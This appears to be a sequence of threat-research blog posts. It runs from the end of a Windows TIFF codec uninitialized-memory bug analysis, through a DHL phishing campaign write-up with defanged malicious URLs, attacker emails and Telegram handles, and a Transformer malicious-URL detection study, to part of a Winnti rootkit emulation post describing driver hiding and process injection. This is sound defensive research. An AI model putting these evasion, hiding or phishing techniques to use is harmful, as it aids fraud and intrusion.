Diffing two distinct execution traces by comparing the instruction pointer (RIP) value, I found a control flow change in windowscodecs!CCCITT::Expand2DLine due to a usage of an uninitialized value. Back tracing the uninitialized value using TTD trace was exceptionally useful for finding the root cause. The following section shows the allocation, population and use of the uninitialized value, which leads to the control flow change and deviance in the pixel outputs.

Allocation

windowscodecs!TIFFReadBufferSetup allocates 0x400 bytes of memory, as shown in Figure 6.

windowscodecs!TIFFReadBufferSetup:
...
allocBuff = malloc(size);
*(v3 + 16) |= 0x200u;
*(v3 + 480) = allocBuff;

0:000> k
# Child-SP RetAddr Call Site
00 000000aa`a654f128 00007ff9`4404d4f3 windowscodecs!TIFFReadBufferSetup
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0xab
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

After allocation:
0:000> !heap -p -a @rax
address 0000029744382140 found in
_HEAP @ 29735190000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0000029744382130 0041 0000 [00] 0000029744382140 00400 - (busy)
unknown!noop

//Uninitialized memory after allocation
0:000> db @rax
00000297`44382140 40 7c 5e 97 29 5d 5f ae-73 31 98 70 b8 4f da ac @|^.)]_.s1.p.O..
00000297`44382150 06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83 .QT..*#:O..'..,.
00000297`44382160 3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9 :%....<....'.sA.
00000297`44382170 fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7 .....>.EL...r.!.
00000297`44382180 c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0 .D.;..D..nK.@18.
00000297`44382190 85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66 ....;...x....Maf
00000297`443821a0 16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44 .}[email protected]
00000297`443821b0 66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94 f&(...R....4._o.

Figure 6: Allocation of memory

Partially Populating the Buffer

0x10 bytes are copied from the input file to this allocated buffer by TIFFReadRawStrip1. The rest of the buffer remains uninitialized with random values, as shown in Figure 7.

if ( !TIFFReadBufferSetup(v2, a2, stripCount) ) {
return 0i64;
}
if ( TIFFReadRawStrip1(v2, v3, sizeToReadFromFile, "TIFFFillStrip") != sizeToReadFromFile )

0:000> r
rax=0000000000000001 rbx=000002973519a7e0 rcx=000002973519a7e0
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000010
rip=00007ff94404d58c rsp=000000aaa654f128 rbp=0000000000000000
r8=0000000000000010 r9=00007ff94416fc38 r10=0000000000000000
r11=000000aaa654ef60 r12=0000000000000001 r13=0000000000000000
r14=0000029744377de0 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000202
windowscodecs!TIFFReadRawStrip1:
00007ff9`4404d58c 488bc4          mov     rax,rsp
0:000> k
# Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d491 windowscodecs!TIFFReadRawStrip1
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0x49
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

0:000> db 00000297`44382140
00000297`44382140 5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c [..U*..o.-..X#.l // 0x10 bytes from file
00000297`44382150 06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83 .QT..*#:O..'..,. // uninitialized memory
00000297`44382160 3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9 :%....<....'.sA.
00000297`44382170 fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7 .....>.EL...r.!.
00000297`44382180 c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0 .D.;..D..nK.@18.
00000297`44382190 85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66 ....;...x....Maf
00000297`443821a0 16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44 .}[email protected]
00000297`443821b0 66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94 f&(...R....4._o.

Figure 7: Partial population of memory

Use of Uninitialized Memory

0:000> r
rax=0000000000000006 rbx=0000000000000007 rcx=0000000000000200
rdx=0000000000011803 rsi=0000029744382150 rdi=0000000000000000
rip=00007ff94414e837 rsp=000000aaa654f050 rbp=0000000000000001
r8=0000029744382550 r9=0000000000000000 r10=0000000000000008
r11=0000000000000013 r12=00007ff94418b7b0 r13=0000000000000003
r14=0000000023006c00 r15=00007ff94418bbb0
iopl=0         nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000206
windowscodecs!CCCITT::Expand2DLine+0x253:
00007ff9`4414e837 0fb606          movzx   eax,byte ptr [rsi] ds:00000297`44382150=06             ; Uninitialized memory being accessed

0:000> k
# Child-SP RetAddr Call Site
00 000000aa`a654f050 00007ff9`4414df80 windowscodecs!CCCITT::Expand2DLine+0x253
01 000000aa`a654f0d0 00007ff9`4412afcc windowscodecs!CCCITT::CCITT_Expand+0xac
02 000000aa`a654f120 00007ff9`4404d3f0 windowscodecs!CCITTDecode+0x7c
03 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0xb8
04 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
05 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
06 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
07 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
08 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
09 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
0a 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

Figure 8: Reading of uninitialized value

Depending on the uninitialized value (Figure 8), different code paths are taken in Expand2DLine, which will change the output pixels, as shown in Figure 9.

{
{
if ( v11 != 1 || a2 )
{
unintValue = *++allocBuffer | (unintValue << 8);          // uninit mem read
}
else
{
unintValue <<= 8;
++allocBuffer;
}
--v11;
v16 += 8;
}
v29 = unintValue >> (v16 - 8);
dependentUninitValue = *(l + 2i64 * v29);
v16 -= *(l + 2i64 * v29 + 1);
if ( dependentUninitValue >= 0 )             // path 1
break;
if ( dependentUninitValue < '\xC0' )
return 0xFFFFFFFFi64;                     // path 2
}
if ( dependentUninitValue <= 0x3F )              // path xx
break;

Figure 9: Use of uninitialized memory in if conditions

Patch

Microsoft decided to patch this vulnerability by using calloc instead of malloc, which initializes the allocated memory with zeros.

Conclusion

Part Two of this blog series presents multiple vulnerabilities in Windows’ built-in image parsers. In the next post, we will explore newer supported image formats in Windows such as RAW, HEIF and more.

Phishing Campaign Leverages WOFF Obfuscation and Telegram Channels for Communication

Threat Research

Bernard Sapaden

26 January 2021 at 20:45

FireEye Email Security recently encountered various phishing campaigns, mostly in the Americas and Europe, using source code obfuscation with compromised or bad domains. These domains were masquerading as authentic websites and stole personal information such as credit card data. The stolen information was then shared to cross-platform, cloud-based instant messaging applications.

Coming off a busy holiday season with a massive surge in deliveries, this post highlights a phishing campaign involving a fake DHL tracking page. While phishing attacks targeting users of shipping services is not new, the techniques used in these examples are more complex than what would be found in an off-the-shelf phishing kit.

This campaign uses a WOFF-based substitution cypher, localization specific targeting, and various evasion techniques which we unravel here in this blog.

Attack Flow

The attack starts with an email imitating DHL, as seen in Figure 1. The email tries to trick the recipient into clicking on a link, which would take them to a fake DHL website. In Figure 2, we can see the fake page asking for credit card details that, if submitted, would give the user a generic response while in the background the credit card data is shared with the attackers.

Figure 1: DHL phishing attempt

Figure 2: Fake website imitating DHL tracking

This DHL phishing campaign uses a rare technique for obfuscating its source page. The page source contains proper strings, valid tags, and appropriate formatting, but contains encoded text that would render gibberish without decoding prior to loading the page, as seen in Figure 3. Typically, decoding such text is done by including script functions within the code. Yet in this case, the decoding functions are not contained in the script.

Figure 3: Snippet of the encoded text on page source

The decoding is done by a Web Open Font Format (WOFF) font file, which happens upon loading the page in a browser and will not be visible in the page content itself. Figure 4 shows the substitution cipher method and the WOFF font file. The attacker does this to evade detection by security vendors. Many security vendors use static or regex signature-based rules, so this method will break those naïve-based conditions.

Figure 4: WOFF substitution cipher

Loading this custom font which decodes the text is done inside the Cascading Style Sheets (CSS). This technique is rare as JavaScript functions are traditionally used to encrypt and decrypt HTML text.

Figure 5: CSS file for loading WOFF font file

Figure 5 shows the CSS file used to load the WOFF font file. We have also seen the same CSS file, style.css, being hosted on the following domains:

hxxps://www.lifepointecc[.]com/wp-content/sinin/style.css
hxxps://candyman-shop[.]com/auth/DHL_HOME/style.css
hxxps://mail.rsi-insure[.]com/vendor/ship/dhexpress/style.css
hxxps://www.scriptarticle[.]com/thro/HOME/style.css

These legitimate-looking domains are not hosting any phishing websites as of now; instead, they appear to be a repository for attackers to use in their phishing campaigns. We have seen similar phishing attacks targeting the banking sector in the past, but this is newer for delivery websites.

Notable Techniques

Localization

The phishing page displays the local language based on the region of the targeted user. The localization code (Figure 6) supports major languages spoken in Europe and the Americas such as Spanish, English, and Portuguese.

Figure 6: Localization code

The backend contains PHP resource files for each supported language (Figure 7), which are picked up dynamically based on the user’s IP address location.

Figure 7: Language resource files

Evasion

This campaign employs a variety of techniques to evade detection. This will not serve up a phishing page if the request came from certain blocked IP addresses. The backend code (Figure 8) served the users with a "HTTP/1.1 403 Forbidden" response header under the following conditions:

IP has been seen five times (AntiBomb_User func)
IP host resolves to its list of avoided host names ('google', 'Altavista', 'Israel', 'M247', 'barracuda', 'niw.com.au' and more) (AntiBomb_WordBoot func)
IP is on its own local blocklist csv (x.csv in the kit) (AntiBomb_Boot func)
IP has seen POSTing three times (AntiBomb_Block func)

Figure 8: Backend evasion code

After looking at the list of blocked hosts, we could deduce that the attackers were trying to block web crawlers.

Data Theft

The attackers behind this phishing campaign attempted to steal credentials, credit card data, and other sensitive information. The stolen data is sent to email addresses and Telegram channels controlled by the attacker. We uncovered a Telegram channel where data is being sent using the Telegram Bot API shown in Figure 9.

Figure 9: Chat log

While using php mail() function to send stolen credentials is quite common, in the near past, encrypted instant messaging applications such as Telegram have been used for sending phished information back to command and control servers.

We were able to access one of the Telegram channels controlled by the attacker as shown in Figure 10. The sensitive information being sent in the chat includes IP addresses and credit card data.

Figure 10: Telegram channel with stolen information

Conclusion

Attackers (and especially phishers) are always on the hunt for new ways to evade detection by security products. Obfuscation gives the attackers an edge, and makes it harder for security vendors to protect their customers.

By using instant messaging applications, attackers get user data in real time and victims have little to respond once their personal information is compromised.

Indicators of Compromise (IOC)

FireEye Email Security utilizing FAUDE (FireEye Advanced URL Detection Engine) protects customers from these types of phishing threats. Unlike traditional anti-phishing techniques dependent on static inspection of phishing URL content, FAUDE uses multiple artificial intelligence (AI) and machine learning (ML) engines to more effectively thwart these attacks.

From December 2020 until the time of posting, our FAUDE detection engine saw more than 100 unique URLs hosting DHL phishing pages with obfuscated source code, including:

hxxps://bit[.]ly/2KJ03RH
hxxps://greencannabisstore[.]com/0258/redirect-new.php
hxxps://directcallsolutions[.]co[.]za/CONTACT/DHL_HOME/
hxxps://danapluss[.]com/wp-admin/dhl/home/
hxxp://r.cloudcyberlink[.]digital/<path> (multiple paths using same domain)

Email Addresses

medmox2k@yandex[.]com
o.spammer@yandex[.]com
cameleonanas2@gmail[.]com

Telegram Users

@Saitama330
@cameleon9

style.css

Md5: 83b9653d14c8f7fb95d6ed6a4a3f18eb)
Sha256: D79ec35dc8277aff48adaf9df3ddd5b3e18ac7013e8c374510624ae37cdfba31

font-woff2

MD5: b051d61b693c76f7a6a5f639177fb820
SHA-256: 5dd216ad75ced5dd6acfb48d1ae11ba66fb373c26da7fc5efbdad9fd1c14f6e3

Domains

Pradosdemojanda[.]com

global-general-trackks.supercarhiredubai[.]com

tracking-dhi.company

Tapolarivercamp[.]com

Rosariumvigil[.]com

Mydhlexpert[.]com

Autorepairbyfradel[.]com

URLs

hxxps://wantirnaosteo[.]com[.]au/logon/home/MARKET/F004f19441/11644210b.php

hxxps://ekartenerji[.]com[.]tr/wp-admin/images/dk/DHL/home.php

hxxps://aksharapratishthan[.]org/admin/imagess/F004f19441/sms1.php

hxxps://royalgateedu[.]com/wp-content/plugins/elementor/includes/libraries/infos/package/F004f19441/00951124a.php

hxxps://vandahering[.]com[.]br/htacess

hxxps://hkagc[.]com/man/age/F004f19441/11644210b.php

hxxps://fiquefitnes[s]comsaude[.]com/.well-known/MARKET/MARKET/F004f19441/11644210b.php

hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php

hxxps://www.instantcopywritingscript[.]com/blog/wp-content/22/DHL/MARKET

hxxps://isss[.]sjs[.]org[.]hk/wp-admin/includes/F004f19441/11644210b.php

hxxps://www.concordceramic[.]com/fr/frais/F004f19441/11644210b.php

hxxps://infomediaoutlet[.]com/oldsite/wp-content/uploads/2017/02/MARKET/

hxxps://wema-wicie[.]pl/dh/l/en/MARKET

hxxps://www.grupoindustrialsp[.]com/DHL/MARKET/

hxxps://marrecodegoias[.]com[.]br/wp-snapshots/activat/MARKET/F004f19441/11644210b.php

hxxps://villaluna[.]de/wp-content/info/MARKET/F004f19441/11644210b.php

hxxp://sandur[.]dk/wp-content/upgrade/-/MARKET/

hxxps://chistimvse[.]com/es/dhl/MARKET/

hxxps://detmayviet[.]com/wp-includes/widgets/-/MARKET/F004f19441/11644210b.php

hxxps://dartebreakfast[.]com/wp-content/plugins/dhl-espress/MARKET/

hxxps://genesisdistributors[.]com/-/Tracking/dhl/Tracking/dhl-tracking/F004f19441/00951124a.php

hxxps://www.goldstartechs[.]com/wp-admin/js/widgets/102/F004f19441/11644210b.php

hxxps://universalpublicschooltalwandisabo[.]com/DHL

hxxps://intranet[.]prorim[.]org[.]br/info/MARKET/F004f19441/11644210b.php

hxxps://administrativos[.]cl/mail.php

hxxps://nataliadurandpsicologa[.]com[.]br/upgrade/MARKET/F004f19441/11644210b.php

hxxps://tanaxinvest[.]com/en/dhl/MARKET/

hxxps://deepbluedivecenter[.]com/clear/item/

hxxps://keystolivingafulfilledlife[.]com/wp-admin/includes/daspoe99i3mdef/DOCUNTRITING

hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php

Training Transformers for Cyber Security Tasks: A Case Study on Malicious URL Prediction

Threat Research

Ethan M. Rudd

21 January 2021 at 17:30

Highlights

Perform a case study on using Transformer models to solve cyber security problems
Train a Transformer model to detect malicious URLs under multiple training regimes
Compare our model against other deep learning methods, and show it performs on-par with other top-scoring models
Identify issues with applying generative pre-training to malicious URL detection, which is a cornerstone of Transformer training in natural language processing (NLP) tasks
Introduce novel loss function that balances classification and generative loss to achieve improved performance on the malicious URL detection task

Introduction

Over the past three years Transformer machine learning (ML) models, or “Transformers” for short, have yielded impressive breakthroughs in a variety of sequence modeling problems, specifically natural language processing (NLP). For example, OpenAI’s latest GPT-3 model is capable of generating long segments of grammatically-correct prose from scratch. Spinoff models, such as those developed for question and answering, are capable of correlating context over multiple sentences. AI Dungeon, a single and multiplayer text adventure game, uses Transformers to generate plausible unlimited content in a variety of fantasy settings. Transformers’ NLP modeling capabilities are apparently so powerful that they pose security risks in their own right, in terms of their potential power to spread disinformation, yet on the other side of the coin, they can be used as powerful tools to detect and mitigate disinformation campaigns. For example, in previous research by the FireEye Data Science team, a NLP Transformer was fine-tuned to detect disinformation on social media sites.

Given the power of these Transformer models, it seems natural to wonder if we can apply them to other types of cyber security problems that do not necessarily involve natural language, per se. In this blog post, we discuss a case study in which we apply Transformers to malicious URL detection. Studying Transformer performance on URL detection problem is a first logical step to extending Transformers to more generic cyber security tasks, since URLs are not technically natural language sequences but share some common characteristics with NLP.

In the following sections, we outline a typical Transformer architecture and discuss how we adapt it to URLs with a character-focused tokenization. We then discuss loss functions we employ to guide the training of the model, and finally compare our training approaches to more conventional ML-based modeling options.

Adapting Transformers to URLs

Our URL Transformer operates at the character level, where each character in the URL corresponds to an input token. When a URL is input to our Transformer, it is appended with special tokens—a classification token (“CLS”) that conditions the model to produce a prediction and padding tokens (“PAD”) that normalize the input to a fixed length to allow for parallel training. Each token in the input string is then projected into a character embedding space, followed by a stack of Attention and Feed-Forward Neural Network (FFNN) layers. This stack of layers is similar to the architecture introduced in the original Transformers paper. At a high level, the Attention layers allow each input to be associated with long-distance context of other characters that are important for the classification task, similar to the notion of attention in humans, while the FFNN layers provide capacity for learning the relationships among the combination of inputs and their respective contexts. An illustration of our architecture is shown in Figure 1.

Additionally, the URL Transformer employs a masking strategy in its Attention calculation, which enforces a left-to-right (L-R) dependence. This means that only input characters from the left of a given character influence that character’s representation in each layer of the attention stack. The network outputs one embedding for each input character, which captures all information learned by the model about the character sequence up to that point in the input.

Once the model is trained, we can use the URL Transformer to perform several different tasks, such as generatively predicting the next character in the input sequence by using the sequence embedding () as an input to another neural network with as softmax output over the possible vocabulary of characters. A specific example of this is shown in Figure 1, where we take the embedding of the input “firee”() and use it to predict the next most likely character, “y.” Similarly, we can use the embedding produced after the classification token to predict other properties of the input sequences, such as their likelihood of maliciousness.

Figure 1: High-level overview of the URL Transformer architecture

Loss Functions and Training Regimes

With the model architecture in hand, we now turn to the question of how we train the model to most effectively detect malicious URLs. Of course, we can train this model in a similar way to other supervised deep learning classifiers by: (1) making predictions on samples from a labeled training set, (2) using a loss function to measure the quality of our predictions, and (3) tune model parameters (i.e., weights) via backpropagation. However, the nature of the Transformer model allows for several interesting variations to this training regime. In fact, one of the reasons that Transformers have become so popular for NLP tasks is because they allow for self-supervised generative pre-training, which takes advantage of massive amounts of unlabeled data to help the model learn general characteristics of the input language before being fine-tuned on the ultimate task at-hand (e.g., question answering, sentiment analysis, etc.). Here, we outline some of the training regimes we explored for our URL Transformer model.

Direct Label Prediction (Decode-To-Label)

Using a training set of URLs with malicious and benign labels, we can treat the URL Transformer architecture as a feature extractor, whose outputs we use as the input to a traditional classifier (e.g., FFNN or even a random forest). When using a FFNN as our classifier, we can backpropagate the classification loss (e.g., binary cross-entropy) through both the classifier and the Transformer network to adjust the weights to perform classification. This training regime is the baseline for our experiments and is how most deep learning models are trained for classification tasks.

Next-Character Prediction Pre-Training and Fine-Tuning

Beyond the baseline classification training regime, the NLP literature suggests that one can learn a self-supervised embedding of the input sequence by training the Transformer to perform a next-character prediction task, then fine-tuning the learned representation for the classification problem. A key advantage of this approach is that data used for pre-training does not require malicious or benign labels; instead, the next characters in a URL serve as the labels to be predicted from prior characters in the sequence. This is similar to the example given in Figure 1, where the embedding output is used to predict the next character, “y,” in “fireeye.com.” Overall, this training regime allows us to take advantage of the massive amount of unlabeled data that is typically available in cyber security-related problems.

The overall structure of the architecture for this regime is similar to the aforementioned binary classification task, with FFNN layers added for classification. However, since we are now predicting multiple classes (i.e., one class per input character in the vocabulary), we must apply a softmax function to the output to induce a probability distribution over the potential output characters. Once the Transformer portion of the network is pre-trained in this way, we can swap the FFNN classification layers focused on character prediction with new layers that will be trained for the malicious URL classification problem, as in the decode-to-label case.

Balanced Mixed-Objective Training

Prior work has shown that imbuing the training process with additional knowledge outside of the primary task can help constrain the learning process, and ultimately result in better models. For instance, a malware classifier might train using loss functions that capture malicious/benign classification, malware family prediction, and tag prediction tasks as a mechanism to provide the classifier with broader understanding of the problem than looking at malicious/benign labels in isolation.

Inspired by these findings, we also introduced a mixed-objective training regime for our URL Transformer, where we train for binary classification and next-character prediction simultaneously. At each iteration of training, we compute a loss multiplier such that each loss contribution is fixed prior to backpropagation. This ensures that neither loss term dominates during training. Specifically, for minibatch i, let the net loss LMixed be computed as follows:

Given hyperparameters a and b, defined such that a + b: = 1, we compute constant a so that the net loss contribution of LCLS to LMixed is a and the net contribution of LNext to LMixed is b. For our evaluations, we set a := b := 0.5, effectively requiring that the model equally balance its ability to generate the next character and accurately predict malicious URLs.

Evaluation

To evaluate our URL Transformer model and better understand the impact of the three training regimes discussed earlier, we collected a training dataset of over 1M labeled malicious and benign URLs, which was split into roughly 700K training samples, 100K validation samples, and 200k test samples. Additionally, we also developed an unlabeled pre-training dataset of 20M URLs.

Using this data, we performed four different training runs for our Transformer model:

DecodeToLabel (Baseline): Using strictly the binary cross-entropy loss on the embedded classification features over the entire sequence, we trained the model for 15 epochs using the training set.
MixedObjective: We trained the model for 15 epochs on the training set, using both the embedded classification features and the embedded next-character prediction features.
FineTune: We pre-trained the model for 15 epochs on the next-character prediction task using the training set, ignoring the malicious/benign labels. We then froze weights over the first 16 layers of the model and trained the model for an additional 15 epochs using a binary cross-entropy loss on the classification labels.
FineTune 20M: We performed pre-training on the next-character prediction task using the 20M URL dataset, pre-training for 2 epochs. We then froze weights over the first 16 layers of the Transformer and trained for 15 epochs on the binary classification task.

The ROC curve shown in Figure 2 compares the performance of these four training regimes. Here, our baseline DecodeToLabel model (red) yielded a ROC curve with 0.9484 AUC, while the MixedObjective model (green) slightly outperformed the baseline with an AUC of 0.956. Interestingly, both of the fine-tuning models yielded poor classification results, which is counter to the established practice of these Transformer models in the NLP domain.

Figure 2: ROC curves for four URL Transformer training regimes

To assess the relative efficacy of our Transformer models on this dataset, we also fit several other types of benchmark models developed for URL classification: (1) a Random Forest model on SME-derived features, (2) a 1D Convolutional Neural Network (CNN) model on character embeddings, and (3) a Long Short-Term Memory (LSTM) neural network on character embeddings. Details of these models can be found in our white paper, however we find that our top performing Transformer model performs on-par with the best performing non-Transformer baseline (a 1D CNN model), which perhaps indicates that the long-range dependencies typically learned by Transformer models are not as useful in the case of malicious URL detection.

Figure 3: ROC curves comparing URL Transformer to other benchmark URL classification models

Summary

Our experiments suggest that Transformers can achieve performance comparable to or better than that of other top-performing models for URL classification, though the details of how to achieve that performance differ from common practice. Contrary to findings from the NLP domain, wherein self-supervised pre-training substantially enhances performance in a fine-tuned classification task, similar pretraining approaches actually diminish performance for malicious URL detection. This suggests that the next character prediction task has too little apparent correlation with the task of malicious/benign prediction for effective/stable transfer.

Interestingly, utilizing next-character prediction as an auxiliary loss function in conjunction with a malicious/benign loss yields improvements over training solely to predict the label. We hypothesize that while pre-training leads to a relatively poor generative model due to randomized content in the URLs within our dataset, a malicious/benign loss may serve to better condition the generative model learned by the next-character prediction task, distilling a subset of relevant information. It may also be the case that the long-distance relationships that are key to the generative pre-training task are not as important for the final malicious URL classification, as evidenced by the performance of the 1D CNN model.

Note that we did not perform a rigorous hyperparameter search for our Transformer, since this research was primarily concerned with loss functions and training regimes. Therefore, it is still an open question as to whether a more optimal architecture, specifically designed for this classification task, could substantially outperform the models described here.

While our URL dataset is not representative of all data in the cyber security space, the difficulty of obtaining a readily fine-tuned model from self-supervised pre-training suggests that this approach is unlikely to work well for training Transformers on longer sequences or sequences with lesser resemblance to natural language (e.g., PE files), but an auxiliary loss might work.

Details about this research and additional results can be found in our associated white paper.

Emulation of Kernel Mode Rootkits With Speakeasy

Threat Research

Andrew Davis

20 January 2021 at 16:45

In August 2020, we released a blog post about how the Speakeasy emulation framework can be used to emulate user mode malware such as shellcode. If you haven’t had a chance, give the post a read today.

In addition to user mode emulation, Speakeasy also supports emulation of kernel mode Windows binaries. When malware authors employ kernel mode malware, it will often be in the form of a device driver whose end goal is total compromise of an infected system. The malware most often doesn’t interact with hardware and instead leverages kernel mode to fully compromise the system and remain hidden.

Challenges With Dynamically Analyzing Kernel Malware

Ideally, a kernel mode sample can be reversed statically using tools such as disassemblers. However, binary packers just as easily obfuscate kernel malware as they do user mode samples. Additionally, static analysis is often expensive and time consuming. If our goal is to automatically analyze many variants of the same malware family, it makes sense to dynamically analyze malicious driver samples.

Dynamic analysis of kernel mode malware can be more involved than with user mode samples. In order to debug kernel malware, a proper environment needs to be created. This usually involves setting up two separate virtual machines as debugger and debugee. The malware can then be loaded as an on-demand kernel service where the driver can be debugged remotely with a tool such as WinDbg.

Several sandbox style applications exist that use hooking or other monitoring techniques but typically target user mode applications. Having similar sandbox monitoring work for kernel mode code would require deep system level hooks that would likely produce significant noise.

Driver Emulation

Emulation has proven to be an effective analysis technique for malicious drivers. No custom setup is required, and drivers can be emulated at scale. In addition, maximum code coverage is easier to achieve than in a sandbox environment. Often, rootkits may expose malicious functionality via I/O request packet (IRP) handlers (or other callbacks). On a normal Windows system these routines are executed when other applications or devices send input/output requests to the driver. This includes common tasks such as reading, writing, or sending device I/O control (IOCTLs) to a driver to execute some type of functionality.

Using emulation, these entry points can be called directly with doped IRP packets in order to identify as much functionality as possible in the rootkit. As we discussed in the first Speakeasy blog post, additional entry points are emulated as they are discovered. A driver’s DriverMain entry point is responsible for initializing a function dispatch table that is called to handle I/O requests. Speakeasy will attempt to emulate each of these functions after the main entry point has completed by supplying a dummy IRP. Additionally, any system threads or work items that are created are sequentially emulated in order to get as much code coverage as possible.

Emulating a Kernel Mode Implant

In this blog post, we will show an example of Speakeasy’s effectiveness at emulating a real kernel mode implant family publicly named Winnti. This sample was chosen despite its age because it transparently implements some classic rootkit functionality. The goal of this post is not to discuss the analysis of the malware itself as it is fairly antiquated. Rather, we will focus on the events that are captured during emulation.

The Winnti sample we will be analyzing has SHA256 hash c465238c9da9c5ea5994fe9faf1b5835767210132db0ce9a79cb1195851a36fb and the original file name tcprelay.sys. For most of this post, we will be examining the emulation report generated by Speakeasy. Note: many techniques employed by this 32-bit rootkit will not work on modern 64-bit versions of Windows due to Kernel Patch Protection (PatchGuard) which protects against modification of critical kernel data structures.

To start, we will instruct Speakeasy to emulate the kernel driver using the command line shown in Figure 1. We instruct Speakeasy to create a full memory dump (using the “-d” flag) so we can acquire memory later. We supply the memory tracing flag (“-m”) which will log all memory reads and writes performed by the malware. This is useful for detecting things like hooking and direct kernel object manipulation (DKOM).

Figure 1: Command line used to emulate the malicious driver

Speakeasy will then begin emulating the malware’s DriverEntry function. The entry point of a driver is responsible for setting up passive callback routines that will service user mode I/O requests as well as callbacks used for device addition, removal, and unloading. Reviewing the emulation report for the malware’s DriverEntry function (identified in the JSON report with an “ep_type” of “entry_point”), shows that the malware finds the base address of the Windows kernel. The malware does this by using the ZwQuerySystemInformation API to locate the base address for all kernel modules and then looking for one named “ntoskrnl.exe”. The malware then manually finds the address of the PsCreateSystemThread API. This is then used to spin up a system thread to perform its actual functionality. Figure 2 shows the APIs called from the malware's entry point.

Figure 2: Key functionality in the tcprelay.sys entry point

Hiding the Driver Object

The malware attempts to hide itself before executing its main system thread. The malware first looks up the “DriverSection” field in its own DRIVER_OBJECT structure. This field holds a linked list containing all loaded kernel modules and the malware attempts to unlink itself to hide from APIs that list loaded drivers. In the “mem_access” field in the Speakeasy report shown in Figure 3, we can see two memory writes to the DriverSection entries before and after itself which will remove itself from the linked list.

Figure 3: Memory write events representing the tcprelay.sys malware attempting to unlink itself in order to hide

As noted in the original Speakeasy blog post, when threads or other dynamic entry points are created at runtime, the framework will follow them for emulation. In this case, the malware created a system thread and Speakeasy automatically emulated it.

Moving on to the newly created thread (identified by an “ep_type” of “system_thread”), we can see the malware begin its real functionality. The malware begins by enumerating all running processes on the host, looking for the service controller process named services.exe. It's important to note that the process listing that gets returned to the emulated samples is configurable via JSON config files supplied at runtime. For more information on these configuration options please see the Speakeasy README on our GitHub repository. An example of this configurable process listing is shown in Figure 4.

Figure 4: Process listing configuration field supplied to Speakeasy

Pivoting to User Mode

Once the malware locates the services.exe process, it will attach to its process context and begin inspecting user mode memory in order to locate the addresses of exported user mode functions. The malware does this so it can later inject an encoded, memory-resident DLL into the services.exe process. Figure 5 shows the APIs used by the rootkit to resolve its user mode exports.

Figure 5: Logged APIs used by tcprelay.sys rootkit to resolve exports for its user mode implant

